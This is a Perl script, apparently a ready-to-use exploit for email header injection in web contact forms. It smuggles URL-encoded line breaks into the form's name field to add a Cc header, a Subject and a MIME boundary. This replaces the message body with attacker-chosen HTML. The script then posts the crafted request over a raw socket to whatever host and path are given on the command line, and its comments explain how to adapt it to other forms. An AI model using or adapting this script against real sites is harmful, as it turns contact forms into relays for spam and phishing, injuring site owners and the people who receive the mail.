#!/usr/bin/perl
use IO::Socket;

$host = shift;
$uri = shift;
$cc = shift;
$cc =~ s/\@/\%40/g;
#print $cc;

# build our fake name with subject and mime header, make sure we fit in 128 bytes
$name = "t%3Cm%40test.org%3E%0Acc%3A$cc%0A";
$name .= "Subject%3AMe%0A";
$name .= "Content-Type:multipart/mixed;%20boundary=31337;%0AX-t:&";
$name_length = length($name);
# modify this if you think the field is being limited a $name_length chars
if ($name_length gt 128) { die "name is too long $name_length\n"; }

# build the new text for our message - sky is the limit! 1024 chars
# since we've built a mime boundary any existing text that the form had will be bypassed by our mime boundary
$text = "text=%0A--31337%0AContent-Type:text/html%0A%0A";
$text .= "Be%20sure%20to%20visit%20http%3A//www.mullingsecurity.com";
$text .= "%0A--31337--%0A&";

# you must customize this section
# basically you need to supply all of the post vars that the script requires
# you can get these by looking at the form source
# you may also need to adjust which field you use for your header injection
# in this case $name works but each script is different
#if the contact script validates the to address change the email
$payload = "email=you%40yourdomain.org&";
$payload .= "name=$name";
$payload .= "text=$text";
$payload .= "Submit=Submit\r\n";
$content_length = length($payload);
#print "Payload has $content_length bytes and $payload\n";

$header = "POST http://$host/$uri HTTP/1.1\n";
$header .= "Host: $host\n";
$header .= "User-Agent: Mozilla/5.0\n";
$header .= "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n";
$header .=  "Accept-Language: en-us,en;q=0.5\n";
$header .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\n";
$header .= "Keep-Alive: 300\n";
$header .= "Proxy-Connection: keep-alive\n";
$header .= "Referer: http://$host\n";
$header .=  "Content-Type: application/x-www-form-urlencoded\n";
$header .= "Content-Length: $content_length\n\n";

$head_length = length($header);
$total_bytes = $head_length + $content_length;
print "Sending attack to http://$host/$uri with total of $total_bytes bytes\n";

#print $header;
#print $payload;

$sock = new IO::Socket::INET (
	PeerAddr => $host,
	PeerPort => '80',
	Proto => 'tcp',
	);

print $sock $header;
print $header;
print $sock $payload;
print $payload;
flush $sock;
while  (<$sock>) {
	chomp; 
	print $_;
	};
close $sock;
print "Done!\n";